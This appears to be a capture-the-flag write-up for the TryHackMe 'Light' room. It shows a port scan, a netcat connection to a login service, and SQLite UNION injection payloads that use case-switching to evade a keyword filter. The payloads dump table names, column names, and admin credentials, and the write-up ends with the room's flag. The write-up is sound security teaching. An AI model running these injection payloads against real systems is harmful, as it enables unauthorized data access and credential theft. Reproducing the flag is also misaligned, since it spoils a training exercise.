Light
Reconnaissance
We start by setting an environment variable for the target IP to simplify command execution:
export TARGET_IP=10.10.13.202
Full Port Scan with Nmap
sudo nmap -p- -Pn --min-rate 5000 $TARGET_IP
Results:
Not shown: 65441 closed tcp ports (reset), 92 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
We identified two open ports: 22 (SSH) and 1337 (unknown service).
Initial Access via Netcat
After detecting an open service on port 1337, we interact with it using Netcat:
nc $TARGET_IP 1337
Upon connecting, the service prompts for a username. A provided username (smokey
) returns a password:
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
This suggests possible SQL Injection vulnerabilities if authentication logic is flawed.
SQL Injection Exploitation
Since the system returns data upon entering a username, we attempt SQL Injection to extract information.
Enumerating Tables
' uNion SeLeCt GrOuP_CoNcAt(name) From sqlite_master WhErE type='table' AnD 'a'='a
Explanation:
sqlite_master
→ Stores database metadata.type='table'
→ Filters only table names.GROUP_CONCAT(name)
→ Merges all table names into a single string.- Case-switching bypass: Some SQL commands are blocked, but changing case circumvents restrictions.
Discovered Tables:
usertable, admintable
Extracting Column Names from admintable
' uNiOn SeLeCt GrOuP_CoNcAt(name) From pragma_table_info('admintable') WhErE 'a'='a
Explanation:
pragma_table_info('admintable')
→ Retrieves column names fromadmintable
.GROUP_CONCAT(name)
→ Concatenates all column names.
Columns Found:
id, username, password
Extracting Data from admintable
' uNiOn SeLeCt GrOuP_CoNcAt(id || ':' || username || ':' || password) From admintable WhErE 'a'='a
Extracted Credentials:
1:TryHackMeAdmin:mamZtAuMlrsEy5bp6q17
2:flag:THM{SQLit3_InJ3cTion_is_SimplE_nO?}